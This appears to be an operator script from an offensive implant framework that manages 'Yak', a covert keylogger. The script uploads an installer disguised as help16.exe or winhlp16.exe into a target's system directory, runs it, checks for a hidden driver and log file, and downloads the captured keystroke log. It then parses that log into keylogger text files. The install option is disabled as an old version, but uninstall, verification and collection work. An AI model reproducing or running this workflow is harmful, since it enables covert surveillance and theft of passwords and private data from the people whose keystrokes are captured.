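#--------------------------------------------------------
# File: Yak.eps
#
# Script to install/uninstall/collect Yak
#
# Entry point. With one argument (INSTALL|UNINSTALL|VERIFY|COLLECT)
# it performs that single task and returns its result; with no
# argument it loops on an interactive menu until option 0 is chosen.
# Operator-side paths are derived from the EP scripts directory;
# the target-side path comes from _GetSystemPath.
#--------------------------------------------------------
@include "_FileExists.epm";
@include "_GenericFunctions.epm";

@echo off;
# From here on identifiers are matched case-insensitively, which is
# why $yakUploadFile and $YakUploadFile refer to the same variable.
@case-sensitive off;

#--------------------------------------------------------
# Get path that EP scripts are run out of
#--------------------------------------------------------
string $ScriptsDir;
_GetEPScriptsPath($ScriptsDir);

int $menuOption;
# Operator-side tool directory, located relative to the scripts directory.
string $localPath = "$ScriptsDir\\..\\..\\..\\tools\\yak";
string $yakUploadFile = "yak_min_install.exe";
string $localInstallPath = "$localPath\\$yakUploadFile";
string $localParsePath = "$localPath\\yak.exe";
# Name the uploaded installer is given on the target (see the check below).
string $fileName = "help16.exe";

#--------------------------------------------------------
# Get system path
#--------------------------------------------------------
string $systemPath;
ifnot (_GetSystemPath($systemPath)) {
    return false;
}

#--------------------------------------------------------
# Check to see if help16.exe exists on the target (shouldn't)
# If it does, fall back to a second name instead of overwriting it.
#--------------------------------------------------------
if (_FileExists ($fileName, "$systemPath")) {
    $fileName = "winhlp16.exe";
}
echo "";

#--------------------------------------------------------
# Non-interactive mode: one task per invocation, then return.
#--------------------------------------------------------
if ($argc > 1) {
    if ($argv[1] == "INSTALL") {
        return YakInstall($localInstallPath, $yakUploadFile, $systemPath, $fileName, "-is");
    }
    else if ($argv[1] == "UNINSTALL") {
        return YakInstall($localInstallPath, $yakUploadFile, $systemPath, $fileName, "-u");
    }
    else if ($argv[1] == "VERIFY") {
        return YakVerify($systemPath);
    }
    else if ($argv[1] == "COLLECT") {
        ifnot (YakCollect($systemPath, $localParsePath)) {
            echo "Collection and parsing could not be completed, please finish manually";
            return false;
        }
        # Return on success as well, like the other tasks and as the
        # usage text promises; previously a successful COLLECT fell
        # through into the interactive menu.
        return true;
    }
    else {
        # "?" is the documented way to ask for usage; anything else is an error.
        ifnot ($argv[1] == "?") {
            echo "$argv[1] is not a valid argument";
        }
        YakUsage();
        return false;
    }
}

#--------------------------------------------------------
# Interactive mode: menu loop, exits only via option 0.
#--------------------------------------------------------
while (true) {
    echo "- Yak";

    # print the command list
    echo "";
    echo " (0). Exit";
    echo " (1). Install";
    echo " (2). Uninstall";
    echo " (3). Verify Install/Uninstall";
    echo " (4). Collect and Parse";

    echo "";
    $menuOption = GetInput("Enter the desired option");

    if ($menuOption == 0) {
        #--------------------------------------------------------
        # Quit
        #--------------------------------------------------------
        return true;

    } else if ($menuOption == 1) {
        YakInstall($localInstallPath, $yakUploadFile, $systemPath, $fileName, "-is");
    } else if ($menuOption == 2) {
        YakInstall($localInstallPath, $yakUploadFile, $systemPath, $fileName, "-u");
    } else if ($menuOption == 3) {
        YakVerify($systemPath);
    } else if ($menuOption == 4) {
        ifnot (YakCollect($systemPath, $localParsePath)) {
            echo "Collection and parsing could not be completed, please finish manually";
        }
    } else {
        #--------------------------------------------------------
        # Invalid menuOption
        #--------------------------------------------------------
        echo "*** Invalid menuOption ***";
    }

    pause;
}

# Not reachable: the loop above only exits through "return true".
return false;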
Sub YakUsage()
{
    #--------------------------------------------------------
    # Print the command-line usage for this script. Always returns
    # true; the caller decides the overall result.
    #--------------------------------------------------------
    echo "Usage: yak [arg]";
    echo " Runs Yak Script to perform Yak install, uninstall, verification, or collect";
    echo "";
    echo "Arguments:";
    echo " [arg]";
    echo " (optional) performs a specific Yak task and returns. ";
    echo " (INSTALL|UNINSTALL|VERIFY|COLLECT)";
    echo "";
    return true;
}
Sub YakInstall(IN string $localInstallPath, IN string $YakUploadFile, IN string $systemPath, IN string $fileName, IN string $command)
{
    #--------------------------------------------------------
    # Upload $localInstallPath to the target as $systemPath\$fileName,
    # run it with $command ("-is" install / "-u" uninstall), then
    # delete the uploaded copy again.
    #
    # Returns true only if both the put and the run succeeded. A
    # failed delete is reported but does not change the result, so
    # a leftover $fileName in $systemPath is possible on that path.
    #
    # NOTE(review): the "-is" branch below returns false on BOTH
    # prompt answers, so the install path never reaches the upload;
    # only "-u" can. This looks deliberate given the warning text.
    #--------------------------------------------------------
    echo "!!! THIS IS THE OLD VERSION OF YAK, YOU PROBABLY SHOULDN'T INSTALL IT!!!";
    if ($command == "-is") {
        # Both arms return false: install is disabled for this version.
        ifnot (prompt "Are you sure you want to proceed?") {
            return false;
        } else {
            echo "You didn't just actually try to do this, did you?";
            return false;
        }
    }
    bool $success = true;
    #--------------------------------------------------------
    # Install Yak - upload and run with -is option
    #--------------------------------------------------------
    echo "Uploading $YakUploadFile to $systemPath\\$fileName";
    ifnot(`put $localInstallPath -name "$systemPath\\$fileName"`){
        echo "Could not put $fileName into $systemPath";
        $success = false;
    }else{
        echo "";
        echo "Running $fileName on target...\n";
        # Echo is turned on so the redirected output of the run is
        # visible to the operator; it is turned off again below
        # whether or not the run succeeds.
        @echo on;
        ifnot(`run -command "$systemPath\\$fileName $command" -redirect`)
        {
            @echo off;
            echo "Could not run $systemPath\\$fileName $command";
            $success = false;
        }
    }
    @echo off;
    echo "";
    # Cleanup runs even when the put failed; the del then just fails
    # and prints the manual-cleanup hint.
    echo "Deleting $systemPath\\$fileName";
    ifnot(`del $fileName -path $systemPath`){
        echo "Could not delete $systemPath\\$fileName";
        echo "Please delete it manually";
    }
    return $success;
}
Sub YakVerify(IN string $systemPath)
{
    #--------------------------------------------------------
    # Check to see if yak files exist
    #
    # Looks for the two on-target artifacts: ntiopa.sys in the
    # system directory (referred to here as the log file) and
    # kbpnp.sys in the drivers subdirectory. Returns true only when
    # both are present; exactly one present is reported as a "bad
    # state", neither as "doesn't exist". Only presence is checked,
    # not contents.
    #--------------------------------------------------------
    bool $logSuccessFlag = true;
    bool $driverSuccessFlag = true;
    bool $success = true;
    if (_FileExists ("ntiopa.sys", "$systemPath")) {
        echo "ntiopa.sys log file exists ... SUCCESSFUL";
    } else {
        echo "ntiopa.sys log file missing ... FAILED";
        $logSuccessFlag = false;

        echo "";
    }
    if (_FileExists ("kbpnp.sys", "$systemPath\\drivers")) {
        echo "kbpnp.sys driver exists ... SUCCESSFUL";
    } else {
        echo "kbpnp.sys driver missing ... FAILED";
        $driverSuccessFlag = false;
    }

    echo "";
    if (($logSuccessFlag == true) && ($driverSuccessFlag == true)) {
        echo "YAK properlly installed on target";
    } else if ((($logSuccessFlag == true) && ($driverSuccessFlag == false)) ||
               (($logSuccessFlag == false) && ($driverSuccessFlag == true))) {
        # Exactly one of the two artifacts is present.
        echo "YAK is in a bad state...need a reboot before it's functional";
        $success = false;
    } else {
        # Neither artifact is present.
        echo "YAK doesn't exist on target!";
        $success = false;
    }
    return $success;
}
Sub YakCollect(IN string $systemPath, IN string $localParsePath)
{
    bool $success = true;
    #--------------------------------------------------------
    # Download Yak and Parse the local file
    #
    # Pulls $systemPath\ntiopa.sys from the target, moves the
    # downloaded copy under Get_Files\NOSEND, and runs the local
    # parser ($localParsePath) over it twice (-tu and -tau output
    # variants). Returns false immediately if the download or the
    # move fails; a failed parser run is reported and makes the
    # result false but does not skip the other run or the final
    # directory listing.
    #--------------------------------------------------------
    echo "Getting $systemPath\\ntiopa.sys...";
    echo "";
    # Recording is on only around the copyget so that GetCmdData can
    # read the local name assigned to the download (presumably from
    # the recorded command data - confirm against the framework).
    @record on;
    ifnot(`copyget "$systemPath\\ntiopa.sys"`){
        echo "Could not copyget $systemPath\\ntiopa.sys";
        @record off;
        return false;
    }
    @record off;
    string $localName = GetCmdData("LocalName");

    # Build $fileDate from every "_"-separated element of the local
    # name after the first, re-joined with "_" (assumes the framework
    # appends such a suffix to the downloaded name - TODO confirm).
    # NOTE(review): $temp is declared string but is indexed and
    # passed to sizeOf like a list; this relies on how split() results
    # are treated here.
    string $temp = split("_", $localName);
    int $counter = 1;
    string $fileDate = "";
    while ($counter < sizeOf($temp)) {
        $fileDate = "$fileDate\_$temp[$counter]";
        $counter++;
    }

    echo "";
    echo "Moving file to NOSEND directory...";
    # mkdir is not checked; an existing directory is the normal case
    # and the move below is what reports a real failure.
    `local mkdir Get_Files\\NOSEND`;
    ifnot(`local move Get_Files\\$localName Get_Files\\NOSEND\\$localName`){
        echo "Could not move Get_Files\\$localName into Get_Files\\NOSEND\\$localName";
        return false;
    }
    echo "";
    echo "Parsing file...";

    ifnot(`local run -command "$localParsePath -tu -i Get_Files\\NOSEND\\$localName -o Get_Files\\NOSEND\\keylogger$fileDate.txt"`){
        echo "Could not run $localParsePath -tu -i";
        $success = false;
    }
    ifnot(`local run -command "$localParsePath -tau -i Get_Files\\NOSEND\\$localName -o Get_Files\\NOSEND\\keylogger_scancodes$fileDate.txt"`){
        echo "Could not run $localParsePath -tau -i";
        $success = false;
    }

    # Brief wait before listing, presumably so the parser's output
    # files are flushed (units not stated on the page - likely ms).
    sleep 3000;
    @echo on;
    `local dir *$fileDate* -path "Get_Files\\NOSEND"`;
    @echo off;
    return $success;
}